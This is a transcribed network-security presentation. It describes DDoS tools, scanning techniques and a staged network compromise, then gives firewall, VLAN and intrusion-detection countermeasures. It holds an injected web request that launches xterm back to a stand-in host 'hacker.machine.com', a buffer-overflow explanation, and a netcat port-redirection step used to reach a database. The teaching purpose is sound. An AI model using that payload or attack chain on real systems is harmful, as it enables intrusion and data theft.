Stop that Big Hack Attack Protecting Your Network from Hackers.

Transcription

1 Stop that Big Hack Attack Protecting Your Network from Hackers Laura Jeanne Knapp Technical Evangelist NetSec_ 010

2 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 020

3 Distributed Denial of Service (DDoS) Yahoo, Amazon.com, CNN.com, Ebay, Etrade, and others were all part of the February 2000 distributed denial of service attack. Tools like Tribe Flood Network (TFN), Trin00, stacheldraht, and shaft NetSec_ 030

4 Smurf Attack x ICMP REPLY D= S= Overwhelm WAN link to destination ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REPLY D= S= ICMP REQ D= S= Used by TFN (Tribe Flood Network ) NetSec_ 040

5 How DDoS Works Scan for systems to hack Install software to scan for, compromise, and infect agents Agents get loaded with remote control attack software Client issues commands to handlers which control agents in a mass attack Handlers Agents NetSec_ 050

6 Stacheldraht Attack (German for Barbed Wire) Once enough agents are ready Hacker sends command to handlers initiating attack Handlers notify agents who then flood the hacked site preventing legitimate users access Handlers Site to be hacked Legitimate Customer Agents NetSec_ 060

7 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 070

8 Typical Network Design Today Mainframe Module Building Module WAN Module CORE Back end database Server Module Internet Module Public Servers NetSec_ 080

9 Access Router Access Control List (ACL) Source Destination Protocol Action Outside DMZ SMTP Permit Back end database Outside DMZ HTTP Permit Public Servers Outside DMZ DNS Permit Outside DMZ SSL Permit Outside Outside ANY ANY EST TCP/UDP Replies ICMP Echo/ Reply Permit Permit 120 NetSec_ 090

10 Firewall Rules Source Destination Protocol Action Back end database Internal Any Any Permit Public Servers Dual firewall configuration Web Server Public SMTP Back end Database Internal SMTP SQL SMTP Permit Permit Inbound traffic limited to services on DMZ Any Any ICMP Echo-reply Permit Open internal network DMZ Internal SSH Permit Full outbound access allowed (no traditional FTP) 120 NetSec_ 100

11 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 110

12 Anatomy of a Network Compromise Mainframe Module Building Module WAN Module Phase 1: Network Recon Phase 2: own the system CORE Phase 3: Exploit trust Back end database Phase 4: Reach for the gold Server Module Internet Module Public Servers Phase 5: own the network NetSec_ 120

13 Network Recon Learn about the site Building Module Mainframe Module WAN Module Discovery sequence Server Module CORE Internet Module Public Servers Back end database Ping sweep (identifies hosts) nmap, ping, hping, icmpquery icmpush Port scan (identifies services) strobe, netcat, fscan, udp_scan, nmap, portscan Whois, DNS, web pages Discovery results Address ranges Hosts Services Servers (smtp, dns, http,...) Outdated software like bind NetSec_ 130

14 Scanning Tools NetSec_ 140

15 Network Recon - Ping Sweep Cable modem subnet Let s look at closer NetSec_ 150

16 Network Recon : Port Scan Not much running This is the default router for my subnet Good security to turn off telnet and other access ports NetSec_ 160

17 Network Recon - Syn Scan This scan on an end user device shows many ports open and potentially vulnerable to use by a hacker Half open scanning Send a syn then wait on response RST = non-listener Syn/ack= listener (tear down session) NetSec_ 170

18 Network Recon :UDP Port Scan This UDP port scan shows status of common UDP ports Again this is an end user device Sends 0 byte UDP packets NetSec_ 180

19 Network Recon : Other Scans Xmas Scan More clandestine than syn scan Turns on FIN, Urge, and PUSH flags Not good against Microsoft OS Idle Scan Truly blind port scan Uses IP fragmentation ID IDS shows predefined zombie machine Shows trusted relationships between machines TCP Header Bit Header Length 16-Bit Source Port Number Reserved (6 Bits) 32-Bit Sequence Number 32-Bit Acknowledgment Number U R G A C K 16-Bit TCP Checksum P S H R S T S Y N F I N TCP Options Data 16-Bit Destination Port Number 16-Bit Window Size 16-Bit Urgent Pointer Fin Stealth Uses bare FIN packet as probe Not good against Microsoft OS ACK Scan Maps firewall rule sets Null scan Turns off all flags NetSec_ 190

20 Own a System Compromise one host Mainframe Module Obvious target is Web Building Module WAN Module Vulnerability scan Send attack sequence CORE Ffqdn=%)A/usr/X11R6/bin/xterm%20- display%20hacker.machine.com:0 Back end database Xterm displayed on hacker machine Server Module Internet Module Public Servers OS version detected Hacker FTPs buffer overflow Buffer overflow allows root access Attacker now owns the system NetSec_ 200

21 Own a System - OS Detection Fingerprints Multiple techniques used to identify OS Based on knowledge of network stack from vendor Has database of known OS fingerprints This one was from a Linksys router even though this application didn t pinpoint exactly. NetSec_ 210

22 Own a System - Buffer Overflow A buffer overflow occurs when something very large is placed in a box far too small for it to fit. It's all gotta go somewhere. An example in code is as follows: void func(void) { int i; char buffer[256]; // * for(i=0;i<512;i++) buffer[i]='a'; //! return; } As you can see, our 'buffer' gets filled with 256 'A's, followed by 256 more that just don't fit. The rest of those 'A's have to go somewhere. And where they go depends on your operating system implementation and programming language Here is a picture of a healthy 32-bit stack, in such an operating system as Windows running on an Intel platform. ESP-> EBP-> Local Variables i Buffer Old Value of EBP Return Address When the "func" procedure returns, it moves EBP back into ESP, and POP's the return address off the stack. When the above line of code marked '!' executes it overflows the buffer, writing 'A's over the old value of EBP and over the return address. By overwriting the return address, you can seriously alter the course of program flow. All you have to do is change the return address to point to a memory location of your choice, and the code you want to execute will be reached when this procedure decides to 'return'. If you stuff the buffer with code bytes, you can then reroute the EIP to them on the next RET, since the stack is considered executable memory in Windows on the Intel architecture. NetSec_ 220

23 Own a System - Exploiting Holes Web Vulnerabilities Inherent in application extensions like c++, Perl, XML, CGI, etc CGI scripts not checking input IIS RDS vulnerability in showcode.asp grants remote command privalages HTTP bypass I grants access to server s logging functions Pages can be edited with no auditing trail Cross scripting exploits the exchange of cookies Scripts can be planted to alter Web page appearance Scripts can launch malware Scripts can capture confidential information attacks Command manipulation attacks EXPN or VRFY can cause a system to crash by attacking mail transfer agent with a buffer overflow Hacker gets access to key files Hacker can add trojan horse to mail server Transport level attacks Cause temporary error condition that results in a debug shell with admin privileges NetSec_ 230

24 Application Layer Attacks CGI-BIN Takes advantage of insecure coding methods New vulnerabilities constantly being discovered Buffer Overflow Specialized code build to overflow the buffers Insecure coding at the heart of these functions NetSec_ 240

25 Root Kits Allows compromised machine to have custom versions of utilities and back doors Hacker can operate without being detected Originally were UNIX based but NT, 2000, XP are becoming available NetSec_ 250

26 Exploit Trust Recon phase 2 Building Module Mainframe Module WAN Module Explore log files running processes configuration files CORE utilize password tools sniff Back end database Results Server Module Internet Module Public Servers Knows userid/passwords Knows communications Knows protocols used NetSec_ 260

27 Reach for the Gold Building Module Mainframe Module WAN Module Firewall blocks hacker access to back end database CORE Use netcat to set up port redirection on web server for port 25 Redirect to back end database port 22 (SSH) Back end database Launch SSH from attack station on port 25 to web server Server Module Internet Module Public Servers Results in interactive session with back end database Root access due to cracked userid/passwords Credit card numbers retrieved NetSec_ 270

28 Port Redirection Attack Attacker Compromised System A Allows traffic entering a compromised machine (i.e SysA/TCP/25 SMTP) to be redirected to a different machine on a different port (SysB/TCP/23) Hacker exploits trusted relationships System B Root kit base install allows redirection process, files, and connections to be hidden NetSec_ 280

29 Password Toolset NetSec_ 290

30 Own the Network Building Module Mainframe Module WAN Module Take over vulnerable systems It s easy - no firewalls, no encryption, no ACLs... CORE Do more pings, port scans, sniffing, vulnerability scans Back end database Exploit Server Module Internet Module Public Servers Send Trojan s Install code for DDoS NetSec_ 300

31 Agenda Components of security threats A typical security network design Designing under siege Design optimization A robust security design NetSec_ 310

32 Threat Assistance Application Layer Root Kits DDoS source DDoS victim Password cracking Port redirection System Admin Intrusion Detection Trust Model Filtering VLANs Network audit Verify forwarding NetSec_ 320

33 Changes in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Firewall the access routers Back end database Pro: No topology impact Pro: session vs packet tracking Public Servers Pro: multiple perimeters Con: impacts router performance NetSec_ 330

34 Change 2 in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Third firewall interface Pro: Doesn t impact routers Con: increased load on firewall Con: topology impact NetSec_ 340

35 Change 3 in the Internet Module Problems Back end database Public services not protected Internet links are vulnerable to DDoS Public Servers No effective visibility into host attacks Solution - Do both Pro: Maximum security Pro: tiered filtering and audit model Con: performance impact NetSec_ 350

36 Impede DDoS Vulnerability Have ISP filter for DDoS RFC 2267: Ingress packets must be from customer addresses Egress packets cannot be from and to customer Make sure ingress packets are valid RFC 1918 ISP filtering on private IP addresses Utilize private IP addresses internally NetSec_ 360

37 Public Host Vulnerability Utilize intrusion detection systems Host based can stop at OS level Network based can stop attacks at the network layer such as DDoS False positives are number one concern - tuning critical Carefully design in placement important Network audit Private VLANs Isolated ports can only communicate with promiscuous ports Promiscuous ports can communicate with all ports Community ports can communicate with other community members and all promiscuous ports All within the same VLAN NetSec_ 370

38 Server Module Problem Absolutely no security Server Module Solution Segment department servers with department VLANs Filter between VLANs based on network number Private VLANs for corporate-wide servers Intrusion detection systems Server Module Network audits NetSec_ 380

39 Building Module Problem Disparate points of access Hosts are hard to protect and manage Only One Subnet! Primary VLAN Community VLAN Community VLAN Promiscuous Port Promiscuous Port Solution VLANs Isolated VLAN Community A x x x Community B Isolated Ports NetSec_ 390

40 Mainframe Module Mainframe Module Problem Mainframe security is often overlooked What is the access control? Mainframe Module Solution Firewall at access router Consider encryption Network audit NetSec_ 400

41 WAN Module Problem WAN Module Trust issues with Internet coexisting with private links Physical issues Packets in clear Auditing is seldom done Solution Network audit Encryption NetSec_ 410

42 The Network Redesign Mainframe Module Building Module WAN Module Server Module Internet Module NetSec_ 420

43 Hacker Prevention Mainframe Module Building Module WAN Module Network compromise attack Server Module Network recon: same level of success Intrusion detection system alarmed security Internet Module own a system Xterm would fail preventing the buffer overflow attack Exploit trust No interactive sessions possible from web to inside Port redirection would fail NetSec_ 430

44 Summary Security is a system wide issue Network security is only as strong as your weakest link Network security is complex Good system administration is at the core of network security Examine your networks often Keep up with known attacks Re-evaluate your security structure NetSec_ 440